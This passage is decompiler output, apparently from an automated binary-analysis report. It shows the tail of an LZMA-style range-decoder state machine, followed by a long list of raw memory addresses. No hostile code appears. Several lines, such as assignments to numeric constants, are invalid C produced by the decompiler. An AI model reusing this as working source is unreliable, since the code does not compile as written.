                                                                                                                                                                                                              							__ecx = (_v20 >> 0xb) * __edi;
                                                                                                                                                                                                              							__eflags = _v16 - __ecx;
                                                                                                                                                                                                              							if(_v16 >= __ecx) {
                                                                                                                                                                                                              								_v20 = _v20 - __ecx;
                                                                                                                                                                                                              								_v16 = _v16 - __ecx;
                                                                                                                                                                                                              								__cx = __ax;
                                                                                                                                                                                                              								_t222 = __edx + 1; // 0x1
                                                                                                                                                                                                              								__ebx = _t222;
                                                                                                                                                                                                              								__cx = __ax >> 5;
                                                                                                                                                                                                              								__eflags = __eax;
                                                                                                                                                                                                              								 *__esi = __ax;
                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                              								_v20 = __ecx;
                                                                                                                                                                                                              								0x800 = 0x800 - __edi;
                                                                                                                                                                                                              								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                                                                                                              								__ebx = __ebx + __ebx;
                                                                                                                                                                                                              								 *__esi = __cx;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							__eflags = _v20 - 0x1000000;
                                                                                                                                                                                                              							_v72 = __ebx;
                                                                                                                                                                                                              							if(_v20 >= 0x1000000) {
                                                                                                                                                                                                              								goto L62;
                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                              								goto L60;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              						case 0x10:
                                                                                                                                                                                                              							L112:
                                                                                                                                                                                                              							__eflags = _v112;
                                                                                                                                                                                                              							if(_v112 == 0) {
                                                                                                                                                                                                              								_v140 = 0x10;
                                                                                                                                                                                                              								goto L173;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							__ecx = _v116;
                                                                                                                                                                                                              							__eax = _v16;
                                                                                                                                                                                                              							_v20 = _v20 << 8;
                                                                                                                                                                                                              							__ecx =  *_v116 & 0x000000ff;
                                                                                                                                                                                                              							_v112 = _v112 - 1;
                                                                                                                                                                                                              							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                                                                                                                                              							_t371 =  &_v116;
                                                                                                                                                                                                              							 *_t371 = _v116 + 1;
                                                                                                                                                                                                              							__eflags =  *_t371;
                                                                                                                                                                                                              							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                                                                                                                                              							goto L114;
                                                                                                                                                                                                              						case 0x11:
                                                                                                                                                                                                              							L71:
                                                                                                                                                                                                              							__esi = _v92;
                                                                                                                                                                                                              							_v136 = 0x12;
                                                                                                                                                                                                              							goto L135;
                                                                                                                                                                                                              						case 0x12:
                                                                                                                                                                                                              							__eflags = _v68;
                                                                                                                                                                                                              							if(_v68 != 0) {
                                                                                                                                                                                                              								__eax = _v92;
                                                                                                                                                                                                              								_v136 = 0x13;
                                                                                                                                                                                                              								__esi = _v92 + 2;
                                                                                                                                                                                                              								L135:
                                                                                                                                                                                                              								_v88 = _t626;
                                                                                                                                                                                                              								goto L136;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							__eax = _v80;
                                                                                                                                                                                                              							_v52 = _v52 & 0x00000000;
                                                                                                                                                                                                              							__ecx = _v92;
                                                                                                                                                                                                              							__eax = _v80 << 4;
                                                                                                                                                                                                              							__eflags = __eax;
                                                                                                                                                                                                              							__eax = _v92 + __eax + 4;
                                                                                                                                                                                                              							goto L133;
                                                                                                                                                                                                              						case 0x13:
                                                                                                                                                                                                              							__eflags = _v68;
                                                                                                                                                                                                              							if(_v68 != 0) {
                                                                                                                                                                                                              								_t475 =  &_v92;
                                                                                                                                                                                                              								 *_t475 = _v92 + 0x204;
                                                                                                                                                                                                              								__eflags =  *_t475;
                                                                                                                                                                                                              								_v52 = 0x10;
                                                                                                                                                                                                              								_v68 = 8;
                                                                                                                                                                                                              								L147:
                                                                                                                                                                                                              								_v128 = 0x14;
                                                                                                                                                                                                              								goto L148;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							__eax = _v80;
                                                                                                                                                                                                              							__ecx = _v92;
                                                                                                                                                                                                              							__eax = _v80 << 4;
                                                                                                                                                                                                              							_v52 = 8;
                                                                                                                                                                                                              							__eax = _v92 + (_v80 << 4) + 0x104;
                                                                                                                                                                                                              							L133:
                                                                                                                                                                                                              							_v92 = __eax;
                                                                                                                                                                                                              							_v68 = 3;
                                                                                                                                                                                                              							goto L147;
                                                                                                                                                                                                              						case 0x14:
                                                                                                                                                                                                              							_v52 = _v52 + __ebx;
                                                                                                                                                                                                              							__eax = _v132;
                                                                                                                                                                                                              							goto L143;
                                                                                                                                                                                                              						case 0x15:
                                                                                                                                                                                                              							__eax = 0;
                                                                                                                                                                                                              							__eflags = _v60 - 7;
                                                                                                                                                                                                              							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                                                                                                                                              							__al = __al & 0x000000fd;
                                                                                                                                                                                                              							__eax = (__eflags >= 0) - 1 + 0xb;
                                                                                                                                                                                                              							_v60 = (__eflags >= 0) - 1 + 0xb;
                                                                                                                                                                                                              							goto L123;
                                                                                                                                                                                                              						case 0x16:
                                                                                                                                                                                                              							__eax = _v52;
                                                                                                                                                                                                              							__eflags = __eax - 4;
                                                                                                                                                                                                              							if(__eax >= 4) {
                                                                                                                                                                                                              								_push(3);
                                                                                                                                                                                                              								_pop(__eax);
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							__ecx = _v8;
                                                                                                                                                                                                              							_v68 = 6;
                                                                                                                                                                                                              							__eax = __eax << 7;
                                                                                                                                                                                                              							_v128 = 0x19;
                                                                                                                                                                                                              							_v92 = __eax;
                                                                                                                                                                                                              							goto L148;
                                                                                                                                                                                                              						case 0x17:
                                                                                                                                                                                                              							L148:
                                                                                                                                                                                                              							__eax = _v68;
                                                                                                                                                                                                              							_v84 = 1;
                                                                                                                                                                                                              							_v76 = _v68;
                                                                                                                                                                                                              							goto L152;
                                                                                                                                                                                                              						case 0x18:
                                                                                                                                                                                                              							L149:
                                                                                                                                                                                                              							__eflags = _v112;
                                                                                                                                                                                                              							if(_v112 == 0) {
                                                                                                                                                                                                              								_v140 = 0x18;
                                                                                                                                                                                                              								goto L173;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							__ecx = _v116;
                                                                                                                                                                                                              							__eax = _v16;
                                                                                                                                                                                                              							_v20 = _v20 << 8;
                                                                                                                                                                                                              							__ecx =  *_v116 & 0x000000ff;
                                                                                                                                                                                                              							_v112 = _v112 - 1;
                                                                                                                                                                                                              							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                                                                                                                                              							_t490 =  &_v116;
                                                                                                                                                                                                              							 *_t490 = _v116 + 1;
                                                                                                                                                                                                              							__eflags =  *_t490;
                                                                                                                                                                                                              							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                                                                                                                                              							L151:
                                                                                                                                                                                                              							_t493 =  &_v76;
                                                                                                                                                                                                              							 *_t493 = _v76 - 1;
                                                                                                                                                                                                              							__eflags =  *_t493;
                                                                                                                                                                                                              							L152:
                                                                                                                                                                                                              							__eflags = _v76;
                                                                                                                                                                                                              							if(_v76 <= 0) {
                                                                                                                                                                                                              								__ecx = _v68;
                                                                                                                                                                                                              								__ebx = _v84;
                                                                                                                                                                                                              								0 = 1;
                                                                                                                                                                                                              								__eax = 1 << __cl;
                                                                                                                                                                                                              								__ebx = _v84 - (1 << __cl);
                                                                                                                                                                                                              								__eax = _v128;
                                                                                                                                                                                                              								_v72 = __ebx;
                                                                                                                                                                                                              								L143:
                                                                                                                                                                                                              								_v140 = _t561;
                                                                                                                                                                                                              								goto L3;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							__eax = _v84;
                                                                                                                                                                                                              							_v20 = _v20 >> 0xb;
                                                                                                                                                                                                              							__edx = _v84 + _v84;
                                                                                                                                                                                                              							__eax = _v92;
                                                                                                                                                                                                              							__esi = __edx + __eax;
                                                                                                                                                                                                              							_v88 = __esi;
                                                                                                                                                                                                              							__ax =  *__esi;
                                                                                                                                                                                                              							__edi = __ax & 0x0000ffff;
                                                                                                                                                                                                              							__ecx = (_v20 >> 0xb) * __edi;
                                                                                                                                                                                                              							__eflags = _v16 - __ecx;
                                                                                                                                                                                                              							if(_v16 >= __ecx) {
                                                                                                                                                                                                              								_v20 = _v20 - __ecx;
                                                                                                                                                                                                              								_v16 = _v16 - __ecx;
                                                                                                                                                                                                              								__cx = __ax;
                                                                                                                                                                                                              								__cx = __ax >> 5;
                                                                                                                                                                                                              								__eax = __eax - __ecx;
                                                                                                                                                                                                              								__edx = __edx + 1;
                                                                                                                                                                                                              								__eflags = __edx;
                                                                                                                                                                                                              								 *__esi = __ax;
                                                                                                                                                                                                              								_v84 = __edx;
                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                              								_v20 = __ecx;
                                                                                                                                                                                                              								0x800 = 0x800 - __edi;
                                                                                                                                                                                                              								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                                                                                                              								_v84 = _v84 << 1;
                                                                                                                                                                                                              								 *__esi = __cx;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							__eflags = _v20 - 0x1000000;
                                                                                                                                                                                                              							if(_v20 >= 0x1000000) {
                                                                                                                                                                                                              								goto L151;
                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                              								goto L149;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              						case 0x19:
                                                                                                                                                                                                              							__eflags = __ebx - 4;
                                                                                                                                                                                                              							if(__ebx < 4) {
                                                                                                                                                                                                              								_v48 = __ebx;
                                                                                                                                                                                                              								L122:
                                                                                                                                                                                                              								_t399 =  &_v48;
                                                                                                                                                                                                              								 *_t399 = _v48 + 1;
                                                                                                                                                                                                              								__eflags =  *_t399;
                                                                                                                                                                                                              								L123:
                                                                                                                                                                                                              								__eax = _v48;
                                                                                                                                                                                                              								__eflags = __eax;
                                                                                                                                                                                                              								if(__eax == 0) {
                                                                                                                                                                                                              									_v52 = _v52 | 0xffffffff;
                                                                                                                                                                                                              									goto L173;
                                                                                                                                                                                                              								}
                                                                                                                                                                                                              								__eflags = __eax - _v100;
                                                                                                                                                                                                              								if(__eax > _v100) {
                                                                                                                                                                                                              									goto L174;
                                                                                                                                                                                                              								}
                                                                                                                                                                                                              								_v52 = _v52 + 2;
                                                                                                                                                                                                              								__eax = _v52;
                                                                                                                                                                                                              								_t406 =  &_v100;
                                                                                                                                                                                                              								 *_t406 = _v100 + _v52;
                                                                                                                                                                                                              								__eflags =  *_t406;
                                                                                                                                                                                                              								goto L126;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							__ecx = __ebx;
                                                                                                                                                                                                              							__eax = __ebx;
                                                                                                                                                                                                              							__ecx = __ebx >> 1;
                                                                                                                                                                                                              							__eax = __ebx & 0x00000001;
                                                                                                                                                                                                              							__ecx = (__ebx >> 1) - 1;
                                                                                                                                                                                                              							__al = __al | 0x00000002;
                                                                                                                                                                                                              							__eax = (__ebx & 0x00000001) << __cl;
                                                                                                                                                                                                              							__eflags = __ebx - 0xe;
                                                                                                                                                                                                              							_v48 = __eax;
                                                                                                                                                                                                              							if(__ebx >= 0xe) {
                                                                                                                                                                                                              								__ebx = 0;
                                                                                                                                                                                                              								_v76 = __ecx;
                                                                                                                                                                                                              								L105:
                                                                                                                                                                                                              								__eflags = _v76;
                                                                                                                                                                                                              								if(_v76 <= 0) {
                                                                                                                                                                                                              									__eax = __eax + __ebx;
                                                                                                                                                                                                              									_v68 = 4;
                                                                                                                                                                                                              									_v48 = __eax;
                                                                                                                                                                                                              									__eax = _v8;
                                                                                                                                                                                                              									__eax = _v8 + 0x644;
                                                                                                                                                                                                              									__eflags = __eax;
                                                                                                                                                                                                              									L111:
                                                                                                                                                                                                              									__ebx = 0;
                                                                                                                                                                                                              									_v92 = __eax;
                                                                                                                                                                                                              									_v84 = 1;
                                                                                                                                                                                                              									_v72 = 0;
                                                                                                                                                                                                              									_v76 = 0;
                                                                                                                                                                                                              									L115:
                                                                                                                                                                                                              									__eax = _v68;
                                                                                                                                                                                                              									__eflags = _v76 - _v68;
                                                                                                                                                                                                              									if(_v76 >= _v68) {
                                                                                                                                                                                                              										_t397 =  &_v48;
                                                                                                                                                                                                              										 *_t397 = _v48 + __ebx;
                                                                                                                                                                                                              										__eflags =  *_t397;
                                                                                                                                                                                                              										goto L122;
                                                                                                                                                                                                              									}
                                                                                                                                                                                                              									__eax = _v84;
                                                                                                                                                                                                              									_v20 = _v20 >> 0xb;
                                                                                                                                                                                                              									__edi = _v84 + _v84;
                                                                                                                                                                                                              									__eax = _v92;
                                                                                                                                                                                                              									__esi = __edi + __eax;
                                                                                                                                                                                                              									_v88 = __esi;
                                                                                                                                                                                                              									__ax =  *__esi;
                                                                                                                                                                                                              									__ecx = __ax & 0x0000ffff;
                                                                                                                                                                                                              									__edx = (_v20 >> 0xb) * __ecx;
                                                                                                                                                                                                              									__eflags = _v16 - __edx;
                                                                                                                                                                                                              									if(_v16 >= __edx) {
                                                                                                                                                                                                              										__ecx = 0;
                                                                                                                                                                                                              										_v20 = _v20 - __edx;
                                                                                                                                                                                                              										__ecx = 1;
                                                                                                                                                                                                              										_v16 = _v16 - __edx;
                                                                                                                                                                                                              										__ebx = 1;
                                                                                                                                                                                                              										__ecx = _v76;
                                                                                                                                                                                                              										__ebx = 1 << __cl;
                                                                                                                                                                                                              										__ecx = 1 << __cl;
                                                                                                                                                                                                              										__ebx = _v72;
                                                                                                                                                                                                              										__ebx = _v72 | __ecx;
                                                                                                                                                                                                              										__cx = __ax;
                                                                                                                                                                                                              										__cx = __ax >> 5;
                                                                                                                                                                                                              										__eax = __eax - __ecx;
                                                                                                                                                                                                              										__edi = __edi + 1;
                                                                                                                                                                                                              										__eflags = __edi;
                                                                                                                                                                                                              										_v72 = __ebx;
                                                                                                                                                                                                              										 *__esi = __ax;
                                                                                                                                                                                                              										_v84 = __edi;
                                                                                                                                                                                                              									} else {
                                                                                                                                                                                                              										_v20 = __edx;
                                                                                                                                                                                                              										0x800 = 0x800 - __ecx;
                                                                                                                                                                                                              										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                                                                                                                                                                              										_v84 = _v84 << 1;
                                                                                                                                                                                                              										 *__esi = __dx;
                                                                                                                                                                                                              									}
                                                                                                                                                                                                              									__eflags = _v20 - 0x1000000;
                                                                                                                                                                                                              									if(_v20 >= 0x1000000) {
                                                                                                                                                                                                              										L114:
                                                                                                                                                                                                              										_t374 =  &_v76;
                                                                                                                                                                                                              										 *_t374 = _v76 + 1;
                                                                                                                                                                                                              										__eflags =  *_t374;
                                                                                                                                                                                                              										goto L115;
                                                                                                                                                                                                              									} else {
                                                                                                                                                                                                              										goto L112;
                                                                                                                                                                                                              									}
                                                                                                                                                                                                              								}
                                                                                                                                                                                                              								__ecx = _v16;
                                                                                                                                                                                                              								__ebx = __ebx + __ebx;
                                                                                                                                                                                                              								_v20 = _v20 >> 1;
                                                                                                                                                                                                              								__eflags = _v16 - _v20;
                                                                                                                                                                                                              								_v72 = __ebx;
                                                                                                                                                                                                              								if(_v16 >= _v20) {
                                                                                                                                                                                                              									__ecx = _v20;
                                                                                                                                                                                                              									_v16 = _v16 - _v20;
                                                                                                                                                                                                              									__ebx = __ebx | 0x00000001;
                                                                                                                                                                                                              									__eflags = __ebx;
                                                                                                                                                                                                              									_v72 = __ebx;
                                                                                                                                                                                                              								}
                                                                                                                                                                                                              								__eflags = _v20 - 0x1000000;
                                                                                                                                                                                                              								if(_v20 >= 0x1000000) {
                                                                                                                                                                                                              									L104:
                                                                                                                                                                                                              									_t344 =  &_v76;
                                                                                                                                                                                                              									 *_t344 = _v76 - 1;
                                                                                                                                                                                                              									__eflags =  *_t344;
                                                                                                                                                                                                              									goto L105;
                                                                                                                                                                                                              								} else {
                                                                                                                                                                                                              									goto L102;
                                                                                                                                                                                                              								}
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							__edx = _v8;
                                                                                                                                                                                                              							__eax = __eax - __ebx;
                                                                                                                                                                                                              							_v68 = __ecx;
                                                                                                                                                                                                              							__eax = _v8 + 0x55e + __eax * 2;
                                                                                                                                                                                                              							goto L111;
                                                                                                                                                                                                              						case 0x1a:
                                                                                                                                                                                                              							L58:
                                                                                                                                                                                                              							__eflags = _v104;
                                                                                                                                                                                                              							if(_v104 == 0) {
                                                                                                                                                                                                              								_v140 = 0x1a;
                                                                                                                                                                                                              								goto L173;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							__ecx = _v108;
                                                                                                                                                                                                              							__al = _v96;
                                                                                                                                                                                                              							__edx = _v12;
                                                                                                                                                                                                              							_v100 = _v100 + 1;
                                                                                                                                                                                                              							_v108 = _v108 + 1;
                                                                                                                                                                                                              							_v104 = _v104 - 1;
                                                                                                                                                                                                              							 *_v108 = __al;
                                                                                                                                                                                                              							__ecx = _v24;
                                                                                                                                                                                                              							 *(_v12 + __ecx) = __al;
                                                                                                                                                                                                              							__eax = __ecx + 1;
                                                                                                                                                                                                              							__edx = 0;
                                                                                                                                                                                                              							_t197 = __eax % _v120;
                                                                                                                                                                                                              							__eax = __eax / _v120;
                                                                                                                                                                                                              							__edx = _t197;
                                                                                                                                                                                                              							goto L82;
                                                                                                                                                                                                              						case 0x1b:
                                                                                                                                                                                                              							L78:
                                                                                                                                                                                                              							__eflags = _v104;
                                                                                                                                                                                                              							if(_v104 == 0) {
                                                                                                                                                                                                              								_v140 = 0x1b;
                                                                                                                                                                                                              								goto L173;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							__eax = _v24;
                                                                                                                                                                                                              							__eax = _v24 - _v48;
                                                                                                                                                                                                              							__eflags = __eax - _v120;
                                                                                                                                                                                                              							if(__eax >= _v120) {
                                                                                                                                                                                                              								__eax = __eax + _v120;
                                                                                                                                                                                                              								__eflags = __eax;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							__edx = _v12;
                                                                                                                                                                                                              							__cl =  *(__edx + __eax);
                                                                                                                                                                                                              							__eax = _v24;
                                                                                                                                                                                                              							_v96 = __cl;
                                                                                                                                                                                                              							 *(__edx + __eax) = __cl;
                                                                                                                                                                                                              							__eax = __eax + 1;
                                                                                                                                                                                                              							__edx = 0;
                                                                                                                                                                                                              							_t280 = __eax % _v120;
                                                                                                                                                                                                              							__eax = __eax / _v120;
                                                                                                                                                                                                              							__edx = _t280;
                                                                                                                                                                                                              							__eax = _v108;
                                                                                                                                                                                                              							_v100 = _v100 + 1;
                                                                                                                                                                                                              							_v108 = _v108 + 1;
                                                                                                                                                                                                              							_t289 =  &_v104;
                                                                                                                                                                                                              							 *_t289 = _v104 - 1;
                                                                                                                                                                                                              							__eflags =  *_t289;
                                                                                                                                                                                                              							 *_v108 = __cl;
                                                                                                                                                                                                              							L82:
                                                                                                                                                                                                              							_v24 = __edx;
                                                                                                                                                                                                              							goto L83;
                                                                                                                                                                                                              						case 0x1c:
                                                                                                                                                                                                              							while(1) {
                                                                                                                                                                                                              								L126:
                                                                                                                                                                                                              								__eflags = _v104;
                                                                                                                                                                                                              								if(_v104 == 0) {
                                                                                                                                                                                                              									break;
                                                                                                                                                                                                              								}
                                                                                                                                                                                                              								__eax = _v24;
                                                                                                                                                                                                              								__eax = _v24 - _v48;
                                                                                                                                                                                                              								__eflags = __eax - _v120;
                                                                                                                                                                                                              								if(__eax >= _v120) {
                                                                                                                                                                                                              									__eax = __eax + _v120;
                                                                                                                                                                                                              									__eflags = __eax;
                                                                                                                                                                                                              								}
                                                                                                                                                                                                              								__edx = _v12;
                                                                                                                                                                                                              								__cl =  *(__edx + __eax);
                                                                                                                                                                                                              								__eax = _v24;
                                                                                                                                                                                                              								_v96 = __cl;
                                                                                                                                                                                                              								 *(__edx + __eax) = __cl;
                                                                                                                                                                                                              								__eax = __eax + 1;
                                                                                                                                                                                                              								__edx = 0;
                                                                                                                                                                                                              								_t420 = __eax % _v120;
                                                                                                                                                                                                              								__eax = __eax / _v120;
                                                                                                                                                                                                              								__edx = _t420;
                                                                                                                                                                                                              								__eax = _v108;
                                                                                                                                                                                                              								_v108 = _v108 + 1;
                                                                                                                                                                                                              								_v104 = _v104 - 1;
                                                                                                                                                                                                              								_v52 = _v52 - 1;
                                                                                                                                                                                                              								__eflags = _v52;
                                                                                                                                                                                                              								 *_v108 = __cl;
                                                                                                                                                                                                              								_v24 = _t420;
                                                                                                                                                                                                              								if(_v52 > 0) {
                                                                                                                                                                                                              									continue;
                                                                                                                                                                                                              								} else {
                                                                                                                                                                                                              									L83:
                                                                                                                                                                                                              									_v140 = 2;
                                                                                                                                                                                                              									goto L3;
                                                                                                                                                                                                              								}
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							_v140 = 0x1c;
                                                                                                                                                                                                              							L173:
                                                                                                                                                                                                              							_push(0x22);
                                                                                                                                                                                                              							_pop(_t574);
                                                                                                                                                                                                              							memcpy(_v148,  &_v140, _t574 << 2);
                                                                                                                                                                                                              							return 0;
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              				}
                                                                                                                                                                                                              				L174:
                                                                                                                                                                                                              				_t538 = _t537 | 0xffffffff;
                                                                                                                                                                                                              				return _t538;
                                                                                                                                                                                                              			}










































                                                                                                                                                                                                              0x00406786
                                                                                                                                                                                                              0x0040678d
                                                                                                                                                                                                              0x00406793
                                                                                                                                                                                                              0x00406799
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x0040679d
                                                                                                                                                                                                              0x004067a9
                                                                                                                                                                                                              0x004067a9
                                                                                                                                                                                                              0x004067a9
                                                                                                                                                                                                              0x004067b2
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x004067b8
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x004067bf
                                                                                                                                                                                                              0x004067c3
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x004067cc
                                                                                                                                                                                                              0x004067cf
                                                                                                                                                                                                              0x004067d2
                                                                                                                                                                                                              0x004067d4
                                                                                                                                                                                                              0x004067d6
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x004067dc
                                                                                                                                                                                                              0x004067df
                                                                                                                                                                                                              0x004067e1
                                                                                                                                                                                                              0x004067e2
                                                                                                                                                                                                              0x004067e5
                                                                                                                                                                                                              0x004067e7
                                                                                                                                                                                                              0x004067e8
                                                                                                                                                                                                              0x004067ea
                                                                                                                                                                                                              0x004067ed
                                                                                                                                                                                                              0x004067f2
                                                                                                                                                                                                              0x004067f7
                                                                                                                                                                                                              0x00406800
                                                                                                                                                                                                              0x00406813
                                                                                                                                                                                                              0x00406816
                                                                                                                                                                                                              0x0040681f
                                                                                                                                                                                                              0x00406822
                                                                                                                                                                                                              0x0040684a
                                                                                                                                                                                                              0x0040684a
                                                                                                                                                                                                              0x0040684c
                                                                                                                                                                                                              0x0040685a
                                                                                                                                                                                                              0x0040685a
                                                                                                                                                                                                              0x0040685e
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x0040684e
                                                                                                                                                                                                              0x0040684e
                                                                                                                                                                                                              0x00406851
                                                                                                                                                                                                              0x00406851
                                                                                                                                                                                                              0x00406852
                                                                                                                                                                                                              0x00406852
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x0040684e
                                                                                                                                                                                                              0x00406824
                                                                                                                                                                                                              0x00406828
                                                                                                                                                                                                              0x0040682d
                                                                                                                                                                                                              0x0040682d
                                                                                                                                                                                                              0x00406836
                                                                                                                                                                                                              0x0040683c
                                                                                                                                                                                                              0x0040683e
                                                                                                                                                                                                              0x00406841
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00406847
                                                                                                                                                                                                              0x00406847
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00406847
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00406864
                                                                                                                                                                                                              0x00406864
                                                                                                                                                                                                              0x00406868
                                                                                                                                                                                                              0x00407114
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00407114
                                                                                                                                                                                                              0x00406871
                                                                                                                                                                                                              0x00406881
                                                                                                                                                                                                              0x00406884
                                                                                                                                                                                                              0x00406887
                                                                                                                                                                                                              0x00406887
                                                                                                                                                                                                              0x00406887
                                                                                                                                                                                                              0x0040688a
                                                                                                                                                                                                              0x0040688a
                                                                                                                                                                                                              0x0040688e
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00406890
                                                                                                                                                                                                              0x00406893
                                                                                                                                                                                                              0x00406896
                                                                                                                                                                                                              0x004068c0
                                                                                                                                                                                                              0x004068c6
                                                                                                                                                                                                              0x004068cd
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x004068cd
                                                                                                                                                                                                              0x00406898
                                                                                                                                                                                                              0x0040689c
                                                                                                                                                                                                              0x0040689f
                                                                                                                                                                                                              0x004068a4
                                                                                                                                                                                                              0x004068a4
                                                                                                                                                                                                              0x004068af
                                                                                                                                                                                                              0x004068b5
                                                                                                                                                                                                              0x004068b7
                                                                                                                                                                                                              0x004068ba
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x004068ff
                                                                                                                                                                                                              0x00406905
                                                                                                                                                                                                              0x00406908
                                                                                                                                                                                                              0x00406915
                                                                                                                                                                                                              0x0040691d
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x004068d4
                                                                                                                                                                                                              0x004068d4
                                                                                                                                                                                                              0x004068d8
                                                                                                                                                                                                              0x00407123
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00407123
                                                                                                                                                                                                              0x004068e4
                                                                                                                                                                                                              0x004068ef
                                                                                                                                                                                                              0x004068ef
                                                                                                                                                                                                              0x004068ef
                                                                                                                                                                                                              0x004068f2
                                                                                                                                                                                                              0x004068f5
                                                                                                                                                                                                              0x004068f8
                                                                                                                                                                                                              0x004068fb
                                                                                                                                                                                                              0x004068fd
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00406f94
                                                                                                                                                                                                              0x00406f94
                                                                                                                                                                                                              0x00406f9a
                                                                                                                                                                                                              0x00406fa0
                                                                                                                                                                                                              0x00406fa3
                                                                                                                                                                                                              0x00406fa6
                                                                                                                                                                                                              0x00406fc0
                                                                                                                                                                                                              0x00406fc3
                                                                                                                                                                                                              0x00406fc9
                                                                                                                                                                                                              0x00406fd4
                                                                                                                                                                                                              0x00406fd4
                                                                                                                                                                                                              0x00406fd6
                                                                                                                                                                                                              0x00406fa8
                                                                                                                                                                                                              0x00406fa8
                                                                                                                                                                                                              0x00406fb7
                                                                                                                                                                                                              0x00406fbb
                                                                                                                                                                                                              0x00406fbb
                                                                                                                                                                                                              0x00406fd9
                                                                                                                                                                                                              0x00406fe0
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00406fe2
                                                                                                                                                                                                              0x00406fe2
                                                                                                                                                                                                              0x00406fe6
                                                                                                                                                                                                              0x00407195
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00407195
                                                                                                                                                                                                              0x00406ff2
                                                                                                                                                                                                              0x00406ff9
                                                                                                                                                                                                              0x00407001
                                                                                                                                                                                                              0x00407001
                                                                                                                                                                                                              0x00407001
                                                                                                                                                                                                              0x00407004
                                                                                                                                                                                                              0x00407007
                                                                                                                                                                                                              0x00407007
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00406925
                                                                                                                                                                                                              0x00406927
                                                                                                                                                                                                              0x0040692a
                                                                                                                                                                                                              0x0040699b
                                                                                                                                                                                                              0x0040699e
                                                                                                                                                                                                              0x004069a1
                                                                                                                                                                                                              0x004069a8
                                                                                                                                                                                                              0x004069b2
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x004069b2
                                                                                                                                                                                                              0x0040692c
                                                                                                                                                                                                              0x00406930
                                                                                                                                                                                                              0x00406933
                                                                                                                                                                                                              0x00406935
                                                                                                                                                                                                              0x00406938
                                                                                                                                                                                                              0x0040693b
                                                                                                                                                                                                              0x0040693d
                                                                                                                                                                                                              0x00406940
                                                                                                                                                                                                              0x00406942
                                                                                                                                                                                                              0x00406947
                                                                                                                                                                                                              0x0040694a
                                                                                                                                                                                                              0x0040694d
                                                                                                                                                                                                              0x00406951
                                                                                                                                                                                                              0x00406958
                                                                                                                                                                                                              0x0040695b
                                                                                                                                                                                                              0x00406962
                                                                                                                                                                                                              0x00406966
                                                                                                                                                                                                              0x0040696e
                                                                                                                                                                                                              0x0040696e
                                                                                                                                                                                                              0x0040696e
                                                                                                                                                                                                              0x00406968
                                                                                                                                                                                                              0x00406968
                                                                                                                                                                                                              0x00406968
                                                                                                                                                                                                              0x0040695d
                                                                                                                                                                                                              0x0040695d
                                                                                                                                                                                                              0x0040695d
                                                                                                                                                                                                              0x00406972
                                                                                                                                                                                                              0x00406975
                                                                                                                                                                                                              0x00406993
                                                                                                                                                                                                              0x00406995
                                                                                                                                                                                                              0x00000000
